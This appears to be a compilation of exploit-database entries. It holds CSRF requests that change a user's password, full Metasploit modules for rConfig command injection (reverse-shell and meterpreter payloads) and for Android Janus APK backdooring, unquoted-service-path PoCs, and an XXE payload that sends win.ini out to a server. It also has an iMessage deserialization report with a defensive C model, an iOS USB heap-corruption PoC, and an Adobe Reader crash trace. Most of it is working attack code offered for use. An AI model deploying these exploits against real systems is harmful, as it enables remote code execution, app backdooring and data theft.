{"displayname":"ogoker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"test@test ","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}

##################################################################################################################################

# CSRF11
# Change Language

PUT /ocs/v2.php/cloud/users/ogoker HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: mRN2MXrwRQuE/fuQ5PNtyp4ulgYRocB99vbydSi8i+E=:yHYOdFWoNCCrk7Lbk8s0jedK3D5cyasWhIO+P3ve2ag=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1

key=language&value=tr

##################################################################################################################################

# CSRF12
# Change User Password

POST /settings/personal/changepassword HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: 0OhP82O7tEe/0gbwiEPrkFfuU9StyaiXNi0yqg02wT4=:gY03tkzjxWyQvE+7/3uy1y6KGezgocP8RFh+4F5Uk3c=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1

oldpassword=abcd1234&newpassword=12345678&newpassword-clone=12345678

##################################################################################################################################
-
rConfig - install Command Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'rConfig install Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated command injection
        vulnerability in rConfig versions 3.9.2 and prior.

        The `install` directory is not automatically removed after
        installation, allowing unauthenticated users to execute arbitrary
        commands via the `ajaxServerSettingsChk.php` file as the web server user.

        This module has been tested successfully on rConfig version 3.9.2
        on CentOS 7.7.1908 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mhaskar', # Discovery and exploit
          'bcoles'   # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2019-16662'],
          ['EDB', '47555'],
          ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
          ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
        ],
      'Platform'       => %w[unix linux],
      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Payload'        => {'BadChars' => "\x00\x0a\x0d\x26"},
      'Targets'        =>
        [
          ['Automatic (Unix In-Memory)',
            'Platform'       => 'unix',
            'Arch'           => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
            'Type'           => :unix_memory
          ],
          ['Automatic (Linux Dropper)',
            'Platform'       => 'linux',
            'Arch'           => [ARCH_X86, ARCH_X64],
            'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
            'Type'           => :linux_dropper
          ]
        ],
      'Privileged'     => false,
      'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
      'DisclosureDate' => '2019-10-28',
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/'])
      ])
  end

  def check
    res = execute_command('id')

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 404
      vprint_error 'Could not find install directory'
      return CheckCode::Safe
    end

    cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first

    unless cmd_res
      return CheckCode::Safe
    end

    vprint_status "Response: #{cmd_res}"

    unless cmd_res.include?('uid=')
      return CheckCode::Detected
    end

    CheckCode::Vulnerable
  end

  def execute_command(cmd, opts = {})
    vprint_status "Executing command: #{cmd}"
    send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'),
      'vars_get' => {'rootUname' => ";#{cmd} #"}
    }, 5)
  end

  def exploit
    unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(:linemax => 1_500)
    end
  end
end
-
Android Janus - APK Signature Bypass (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/payload/apk'

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Android::Priv
  include Msf::Payload::Android

  def initialize(info={})
    super( update_info( info, {
      'Name'           => "Android Janus APK Signature bypass",
      'Description'    => %q{
        This module exploits CVE-2017-13156 in Android to install a payload into another
        application. The payload APK will have the same signature and can be installed
        as an update, preserving the existing data. The vulnerability was fixed in the
        5th December 2017 security patch, and was additionally fixed by the APK Signature
        scheme v2, so only APKs signed with the v1 scheme are vulnerable. Payload handler
        is disabled, and a multi/handler must be started first.
      },
      'Author'         => [
        'GuardSquare', # discovery
        'V-E-O',       # proof of concept
        'timwr',       # metasploit module
        'h00die',      # metasploit module
      ],
      'References'     => [
        [ 'CVE', '2017-13156' ],
        [ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ],
        [ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ],
      ],
      'DisclosureDate' => 'Jul 31 2017',
      'SessionTypes'   => [ 'meterpreter' ],
      'Platform'       => [ 'android' ],
      'Arch'           => [ ARCH_DALVIK ],
      'Targets'        => [ [ 'Automatic', {} ] ],
      'DefaultOptions' => {
        'PAYLOAD'               => 'android/meterpreter/reverse_tcp',
        'AndroidWakelock'       => false, # the target may not have the WAKE_LOCK permission
        'DisablePayloadHandler' => true,
      },
      'DefaultTarget'  => 0,
      'Notes'          => {
        'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'],
        'Stability'   => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore
      }
    }))
    register_options([
      OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']),
    ])
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
    ]
  end

  def check
    os = cmd_exec("getprop ro.build.version.release")
    unless Gem::Version.new(os).between?(Gem::Version.new('5.1.1'), Gem::Version.new('8.0.0'))
      vprint_error "Android version #{os} is not vulnerable."
      return CheckCode::Safe
    end
    vprint_good "Android version #{os} appears to be vulnerable."

    patch = cmd_exec('getprop ro.build.version.security_patch')
    if patch.empty?
      print_status 'Unable to determine patch level. Pre-5.0 this is unaccessible.'
    elsif patch > '2017-12-05'
      vprint_error "Android security patch level #{patch} is patched."
      return CheckCode::Safe
    else
      vprint_good "Android security patch level #{patch} is vulnerable"
    end
    CheckCode::Appears
  end

  def exploit
    def infect(apkfile)
      unless apkfile.start_with?("package:")
        fail_with Failure::BadConfig, 'Unable to locate app apk'
      end
      apkfile = apkfile[8..-1]
      print_status "Downloading APK: #{apkfile}"
      apk_data = read_file(apkfile)

      begin
        # Create an apk with the payload injected
        apk_backdoor = ::Msf::Payload::Apk.new
        apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)

        # Extract the classes.dex
        dex_data = ''
        Zip::File.open_buffer(apk_zip) do |zipfile|
          dex_data = zipfile.read("classes.dex")
        end
        dex_size = dex_data.length

        # Fix the original APKs zip file code directory
        cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
        cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0]
        apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V")
        pos = cd_start_addr
        while pos && pos < cd_end_addr
          offset = apk_data[pos+42, pos+46].unpack("V")[0]
          apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V")
          pos = apk_data.index("\x50\x4b\x01\x02", pos+46)
        end

        # Prepend the new classes.dex to the apk
        out_data = dex_data + apk_data
        out_data[32...36] = [ out_data.length ].pack("V")
        out_data = fix_dex_header(out_data)

        out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk"
        print_status "Uploading APK: #{out_apk}"
        write_file(out_apk, out_data)
        register_file_for_cleanup(out_apk)
        print_status "APK uploaded"

        # Prompt the user to update the APK
        session.appapi.app_install(out_apk)
        print_status "User should now have a prompt to install an updated version of the app"
        true
      rescue => e
        print_error e.to_s
        false
      end
    end

    unless [CheckCode::Detected, CheckCode::Appears].include? check
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if datastore["PACKAGE"] == 'ALL'
      vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)')
      apkfiles = []
      all = cmd_exec("pm list packages").split("\n")
      c = 1
      all.each do |package|
        package = package.split(':')[1]
        vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}")
        c += 1
        next if ['com.metasploit.stage', # avoid injecting into ourself
                ].include? package # This was left on purpose to be expanded as need be for testing
        result = infect(cmd_exec("pm path #{package}"))
        break if result
      end
    else
      infect(cmd_exec("pm path #{datastore["PACKAGE"]}"))
    end
  end
end
-
_GCafé 3.0 - 'gbClienService' Unquoted Service Path
# Exploit Title: _GCafé 3.0 - 'gbClienService' Unquoted Service Path
# Google Dork: N/A
# Date: 2019-11-09
# Exploit Author: Doan Nguyen (4ll4u)
# Vendor Homepage: https://gcafe.vn/
# Software Link: https://gcafe.vn/post/view?slug=gcafe-3.0
# Version: v3.0
# Tested on: Windows 7, Win 10, WinXP
# CVE : N/A

# Description:
# GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points

# PoC:
# wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

gbClientService    gbClientService    C:\Program Files\GBillingClient\gbClientService.exe    Auto

#C:\>sc qc gbClientService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: gbClientService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\GBillingClient\gbClientService.exe
        LOAD_ORDER_GROUP   : GarenaGroup
        TAG                : 0
        DISPLAY_NAME       : gbClientService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>
-
XML Notepad 2.8.0.4 - XML External Entity Injection
# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
# Date: 2019-11-11
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage: https://www.microsoft.com/
# Software Link: https://github.com/microsoft/XmlNotepad
# Version: XML Notepad 2.8.0.4
# Tested on: Windows 10 Pro
# CVE : N/A

# Step 1) File -> Open -> *.xml

# Exploit Code

1) Server(python 3.7) : python -m http.server

2) Poc.xml :

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

3) payload.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

--------------------------------------------------------------------------------
-
Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path
# Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path
# Date: 2019-11-07
# Exploit Author: Héctor Gabriel Chimecatl Hernández
# Vendor Homepage: https://www.alps.com/e/
# Software Link: https://www.alps.com/e/
# Version: 8.1.0.10
# Tested on: Windows 10 Home Single Language x64 Esp

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Service info:

Alps HID Monitor Service    ApHidMonitorService    C:\Program Files\Apoint2K\HidMonitorSvc.exe    Auto

C:\Users\user>sc qc ApHidMonitorService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ApHidMonitorService
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 1   NORMAL
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Apoint2K\HidMonitorSvc.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Alps HID Monitor Service
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address
During processing of incoming iMessages, attacker controlled data is deserialized using the NSUnarchiver API. One of the classes that is allowed to be decoded from the incoming data is NSDictionary. However, due to the logic of NSUnarchiver, all subclasses of NSDictionary that also implement secure coding can then be deserialized as well. NSSharedKeyDictionary is an example of such a subclass.

A NSSharedKeyDictionary is a dictionary for which, for performance reasons, the keys are predefined using a NSSharedKeySet. A NSSharedKeyDictionary is essentially a linear array of values and a pointer to its NSSharedKeySet. An NSSharedKeySet on the other hand looks roughly like this (with some fields omitted for simplicity and translated to pseudo-C):

struct NSSharedKeySet {
    unsigned int _numKeys;        // The number of keys in the _keys array
    id* _keys;                    // A pointer to an array containing the key values
    unsigned int* _rankTable;     // A table basically mapping the hashes of
                                  // the keys to an index into _keys
    unsigned int _M;              // The size of the _rankTable
    unsigned int _factor;         // Used to compute the index into _rankTable from a hash.
    NSSharedKeySet* _subKeySet;   // The next KeySet in the chain
};

The value lookup on an NSSharedKeyDictionary then works roughly as follows:

* NSSharedKeyDictionary invokes [NSSharedKeySet indexForKey:] on its associated keySet
* indexForKey: computes the hash of the key, basically computes rti = hash % _factor, bounds-checks that against _M, and finally uses it to lookup the index in its rankTable: idx = _rankTable[rti]
* It verifies that idx < _numKeys
* It loads _keys[idx] and invokes [key isEqual:candidate] with it as argument
* If the result is true, the index has been found and is returned to the NSSharedKeyDictionary where it is used to index into its values array
* If not, indexForKey: recursively processes the subKeySet in the same way until it either finds the key or there is no subKeySet left, in which case it returns -1

The NSArchiver format is powerful enough to allow reference cycles between decoded objects. This now enables the following attack:

SharedKeyDictionary1 --[ keySet ]-> SharedKeySet1 --[ subKeySet ]-> SharedKeySet2 --+
                                         ^                                          |
                                         |              [ subKeySet ]               |
                                         +------------------------------------------+

What will happen now is the following:

* The SharedKeyDictionary1 is decoded and its initWithCoder: executed
* [NSSharedKeyDictionary initWithCoder:] decodes its _keySet, which is SharedKeySet1
* The [NSSharedKeySet initWithCoder:] for SharedKeySet1 reads and initializes the following fields:
  * _numKeys, which at this point is unchecked and can be any unsigned integer value. Only later will it be checked to be equal to the number of keys in the _keys array.
  * _rankTable, with completely attacker controlled content
  * _M, which must be equal to the size of the _rankTable
  * _factor, which must be a prime but otherwise can be arbitrarily chosen
  At this point, _numKeys = 0xffffffff but _keys is still nullptr (because ObjC objects are allocated with calloc)
* Next, *before* initializing _keys, it deserializes the _subKeySet, SharedKeySet2
* [NSSharedKeySet initWithCoder:] of SharedKeySet2 finishes, and at the end verifies that it is a valid SharedKeySet. It does that by checking that all its keys correctly map to an index. For that it calls [NSSharedKeySet indexForKey:] on itself for every key.
* (At least) one of the keys will, however, not be found on SharedKeySet2. As such, indexForKey: will proceed to search for the key in its _subKeySet, which is actually SharedKeySet1
* The lookup proceeds and determines that the index should be (in our case) 2189591170, which is less than SharedKeySet1->_numKeys (which is still 0xffffffff)
* It then loads SharedKeySet1->_keys[2189591170], which, as _keys is still nullptr, reads an objc_object* from 0x414141410 and thus crashes

The attached PoC demonstrates this on the latest macOS 10.14.6

> clang -o tester tester.m -framework Foundation
> ./generator.py
> lldb -- ./tester payload.xml
(lldb) target create "./tester"
Current executable set to './tester' (x86_64).
(lldb) settings set -- target.run-args "payload.xml"
(lldb) r
2019-07-29 15:40:28.989305+0200 tester[71168:496831] Let's go
Process 71168 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x414141410)
    frame #0: 0x00007fff3390d3e7 CoreFoundation`-[NSSharedKeySet indexForKey:] + 566
CoreFoundation`-[NSSharedKeySet indexForKey:]:
->  0x7fff3390d3e7 <+566>: mov    rdx, qword ptr [rax + 8*r13]

Combined with a heap spray, this bug could likely be remotely exploitable.
Ideally, this issue and similar ones can be prevented by removing the NSSharedKeyDictionary attack surface completely, as originally suggested by Natalie. Alternatively, I think another solution might be to stop encoding all the internal fields of the NSSharedKeyDictionary/NSSharedKeySet (rankTable, numKeys, especially the subKeySet, ...) and only encode the keys and values. The new [initWithCoder:] implementations could then just call +[NSSharedKeySet keySetWithKeys:] and +[NSSharedKeyDictionary sharedKeyDictionaryWithKeySet:] to construct new instances with the decoded keys and values. This should be fine as all the other fields are implementation details anyway. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47608.zip
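Not part of the report above: an added C model of the chained key-set lookup it describes, showing that the original `idx < _numKeys` check is satisfied for SharedKeySet1 although its `_keys` pointer is still NULL, beside a hardened lookup that validates every set's fields before using it and stops on subKeySet cycles. The struct layout mirrors the pseudo-C in the report; the hash function, key strings and rank-table contents are constructed for the example.

```c
#include <stddef.h>
#include <string.h>

/* Model of the report's pseudo-C struct; keys are C strings rather than ObjC
   objects so this constructed example runs stand-alone. */
typedef struct KeySet {
    unsigned int   _numKeys;
    const char   **_keys;
    unsigned int  *_rankTable;
    unsigned int   _M;
    unsigned int   _factor;
    struct KeySet *_subKeySet;
} KeySet;

enum { LOOKUP_NOT_FOUND = -1, LOOKUP_UNINITIALISED = -2, LOOKUP_CYCLE = -3 };
/* Stand-in for -[NSObject hash]; the scenarios use _factor = 1 so rti is always 0. */
static unsigned int key_hash(const char *s) {
    unsigned int h = 5381;
    while (*s) h = h * 33 + (unsigned char)*s++;
    return h;
}

/* The report's check sequence, stopped just before the _keys[idx] load.
   Returns 1 when rti < _M and idx < _numKeys both hold; idx goes to *idx_out. */
static int passes_original_checks(const KeySet *ks, const char *key,
                                  unsigned int *idx_out) {
    if (ks->_factor == 0) return 0;
    unsigned int rti = key_hash(key) % ks->_factor;
    if (rti >= ks->_M) return 0;
    *idx_out = ks->_rankTable[rti];
    return *idx_out < ks->_numKeys;
}

/* Conditions a decoder can only verify once *all* fields are populated;
   the hardened lookup re-checks them before trusting any set in the chain. */
static int keyset_is_consistent(const KeySet *ks) {
    if (ks->_factor == 0) return 0;
    if (ks->_numKeys != 0 && ks->_keys == NULL) return 0;  /* the report's state */
    if (ks->_M != 0 && ks->_rankTable == NULL) return 0;
    for (unsigned int i = 0; i < ks->_M; i++)
        if (ks->_rankTable[i] >= ks->_numKeys) return 0;
    return 1;
}

/* Same walk as indexForKey:, plus per-set validation and cycle detection. */
static long index_for_key_hardened(const KeySet *root, const char *key) {
    const KeySet *seen[64];
    size_t depth = 0;
    for (const KeySet *ks = root; ks != NULL; ks = ks->_subKeySet) {
        for (size_t i = 0; i < depth; i++)
            if (seen[i] == ks) return LOOKUP_CYCLE;
        if (depth == sizeof seen / sizeof seen[0]) return LOOKUP_CYCLE;
        seen[depth++] = ks;
        if (!keyset_is_consistent(ks)) return LOOKUP_UNINITIALISED;
        unsigned int rti = key_hash(key) % ks->_factor;
        if (rti >= ks->_M) continue;
        unsigned int idx = ks->_rankTable[rti];
        if (strcmp(ks->_keys[idx], key) == 0) return (long)idx;
    }
    return LOOKUP_NOT_FOUND;
}

/* Constructed data: set1 has _numKeys decoded but _keys still NULL (the
   report's SharedKeySet1), set2 is complete and chains back to set1. */
static const char  *set2_keys[] = { "alpha" }, *set3_keys[] = { "gamma" };
static unsigned int set1_rank[] = { 2189591170u };  /* index quoted in the report */
static unsigned int set2_rank[] = { 0 }, set3_rank[] = { 0 };
static KeySet set1, set2, set3;

static void build_report_scenario(void) {
    set1 = (KeySet){ 0xffffffffu, NULL, set1_rank, 1, 1, &set2 };
    set2 = (KeySet){ 1, set2_keys, set2_rank, 1, 1, &set1 };
}

/* For a key absent from set2: the index at which the original code would load
   set1->_keys[idx] although _keys is NULL, or 0 if its checks would stop it. */
static unsigned int original_would_read_index(const char *key) {
    unsigned int idx = 0;
    build_report_scenario();
    if (passes_original_checks(&set2, key, &idx) && strcmp(set2_keys[idx], key) == 0)
        return 0;  /* found in set2 itself, no chain walk */
    return passes_original_checks(&set1, key, &idx) ? idx : 0;
}

static long hardened_lookup_in_scenario(const char *key) {
    build_report_scenario();
    return index_for_key_hardened(&set2, key);
}

/* A well-formed chain that also loops back (set2 -> set3 -> set2). */
static long hardened_lookup_valid_chain(const char *key) {
    set2 = (KeySet){ 1, set2_keys, set2_rank, 1, 1, &set3 };
    set3 = (KeySet){ 1, set3_keys, set3_rank, 1, 1, &set2 };
    return index_for_key_hardened(&set2, key);
}
```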
-
iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)
# Exploit Title: iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)
# Date: 2019-10-29
# Exploit Author: Sem Voigtlander, Joshua Hill and Raz Mashat
# Vendor Homepage: https://apple.com/
# Software Link: https://support.apple.com/en-hk/HT210606
# Version: iOS 13
# Tested on: iOS 12.4.1
# CVE : N/A

# A vulnerable implementation of IOInterruptEventSource on a workloop exists in IOUSBDeviceFamily.
# The code can be triggered by a local attacker by sending a malicious USB control request to device.
# It seems the faulting address register is corrupted as result of a heap corruption vulnerability.
# However, on earlier iOS versions (tested on 12.0.1) we were able to trigger a use after free in reserved->statistics relating to the same vulnerable code too.
# This bug was found through statically analyzing xnu from public source and optimized USB fuzzing.
# A proof of concept written in C for macOS is attached, for other platforms python and c code using libusb exists on GitHub (https://github.com/userlandkernel/USBusted)

iousbusted.c

/*
  Pure IOKit implementation of CVE-2019-8718
  Written by Sem Voigtländer.
  Compile: clang iousbusted.c -o iousbusted -framework IOKit -framework CoreFoundation
  Tip: You can also use this for projects like checkm8 autopwn etc.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <mach/mach.h>
#include <IOKit/usb/IOUSBLib.h>
#include <IOKit/IOCFPlugIn.h>
#include <CoreFoundation/CoreFoundation.h>

/* Faster comparisons for 64-bit integers than != and == */
#define FCOMP(P1,P2) !(P1 ^ P2)

const char *defaultMsg = "HELLO WORLD";

/* Method for sending an USB control message to a target device */
static int send_usb_msg(IOUSBDeviceInterface** dev, int type, int reqno, int val, int idx, const char *msg) {
    if(!dev){
        printf("No device handle given.\n");
        return KERN_FAILURE;
    }
    if(!msg)
        msg = defaultMsg;

    IOUSBDevRequest req;
    req.bmRequestType = type;
    req.bRequest = reqno;
    req.wValue = val;
    req.wIndex = idx;
    req.wLength = strlen(msg);
    req.pData = (void *)msg;
    req.wLenDone = 0;

    IOReturn rc = KERN_SUCCESS;
    rc = (*dev)->DeviceRequest(dev, &req);
    if(rc != KERN_SUCCESS) {
        return rc;
    }
    return KERN_SUCCESS;
}

static int send_usbusted_pwn_msg(IOUSBDeviceInterface** dev, const char *msg) {
    if(!dev){
        printf("No device handle given.\n");
        return KERN_FAILURE;
    }
    kern_return_t rc = send_usb_msg(dev, 0|0x80, 0x6, 0x30c, 0x409, msg);
    if(rc != kIOReturnSuccess) {
        return rc;
    }
    return KERN_SUCCESS;
}

/* Print information from an IOKit USB device */
static int print_usb_device(io_service_t device){
    kern_return_t err = KERN_SUCCESS;
    CFNumberRef vid = 0;
    CFNumberRef pid = 0;
    CFNumberRef locationID = 0;
    CFMutableDictionaryRef p = NULL;

    err = IORegistryEntryCreateCFProperties(device, &p, NULL, 0);
    if(err != KERN_SUCCESS || !p)
        return err;

    if(!CFDictionaryGetValueIfPresent(p, CFSTR("idVendor"), &vid))
        return KERN_FAILURE;
    if(!CFDictionaryGetValueIfPresent(p, CFSTR("idProduct"), &pid))
        return KERN_FAILURE;
    CFDictionaryGetValueIfPresent(p, CFSTR("locationID"), &locationID);

    CFNumberGetValue(vid, kCFNumberSInt32Type, &vid);
    CFNumberGetValue(pid, kCFNumberSInt32Type, &pid); // <-- yes I know this is dirty, I was tired.
    if(locationID)
        CFNumberGetValue(locationID, kCFNumberSInt32Type, &locationID);

    printf("Got device %#x @ %#x (%#x:%#x)\n", device, locationID, vid, pid);
    return err;
}

/* Get a handle for sending to a device */
static int get_usbdevice_handle(io_service_t device, IOUSBDeviceInterface*** dev){
    kern_return_t err = KERN_SUCCESS;
    SInt32 score;
    IOCFPlugInInterface** plugInInterface = NULL;

    err = IOCreatePlugInInterfaceForService(device, kIOUSBDeviceUserClientTypeID, kIOCFPlugInInterfaceID, &plugInInterface, &score);
    if (err != KERN_SUCCESS || plugInInterface == NULL)
        return err;

    err = (*plugInInterface)->QueryInterface(plugInInterface, CFUUIDGetUUIDBytes(kIOUSBDeviceInterfaceID), (LPVOID*)dev);
    if(err != kIOReturnSuccess)
        return err;

    // Now done with the plugin interface.
    (*plugInInterface)->Release(plugInInterface);
    //plugInInterface = NULL;

    if(!*dev)
        return KERN_FAILURE;
    return err;
}

/* Iterate over all USB devices */
static int iterate_usb_devices(const char *msg){
    CFMutableDictionaryRef matchingDict;
    io_iterator_t iter;
    kern_return_t kr;
    io_service_t device;

    /* set up a matching dictionary for the class */
    matchingDict = IOServiceMatching(kIOUSBDeviceClassName);
    if (matchingDict == NULL) {
        return -1; // fail
    }

    /* Now we have a dictionary, get an iterator.*/
    kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter);
    if (kr != KERN_SUCCESS) {
        return -1;
    }

    /* iterate */
    while ((device = IOIteratorNext(iter))) {
        /* do something with device, eg. check properties */
        kr = print_usb_device(device);
        if(kr != KERN_SUCCESS){
            printf("Skipping device as it has no vid / pid.\n");
            continue;
        }

        IOUSBDeviceInterface **dev = 0;
        kr = get_usbdevice_handle(device, &dev);
        if(kr != KERN_SUCCESS){
            printf("Skipping device as no handle for it could be retrieved.\n");
            continue;
        }

        kr = send_usbusted_pwn_msg(dev, msg);
        printf("RET: %s\n\n", mach_error_string(kr));

        /* And free the reference taken before continuing to the next item */
        IOObjectRelease(device);
    }

    /* Done, release the iterator */
    IOObjectRelease(iter);
    return 0;
}

int main(int argc, char *argv[]){
    char payload[109];
    memset(payload, 'A', 108);
    payload[108] = '\0'; /* strlen() in send_usb_msg needs a terminator */
    int err = iterate_usb_devices(payload);
    return err;
}
-
Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:

--- cut ---
(88e4.30f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0478be34 ecx=00000000 edx=c0c0c0c0 esi=00000000 edi=00000000
eip=5fdc2341 esp=0478bd24 ebp=0478bd54 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1:
5fdc2341 8a4a04          mov     cl,byte ptr [edx+4]        ds:002b:c0c0c0c4=??
0:000> kb
 # ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0478bd54 5fdb1157 0478be48 ceb1c57a 68754f88 AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1
01 0478bea0 5fdafd04 68754f88 00000002 687fefe8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x35f7
02 0478bed8 5fda234f 5f198f54 5f198f54 68504fb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21a4
03 0478beec 5fd95227 68504fb8 00000044 684fcf40 AcroRd32!AX_PDXlateToHostEx+0x34468f
04 0478bfa0 5f795889 5f198f54 590b4fb0 5f7957f0 AcroRd32!AX_PDXlateToHostEx+0x337567
05 0478bfc4 5f795783 4d346ff8 00000001 00000001 AcroRd32!DllCanUnloadNow+0x4c929
06 0478bfe4 5fbe1d7a 0478c008 4d346ff8 00000001 AcroRd32!DllCanUnloadNow+0x4c823
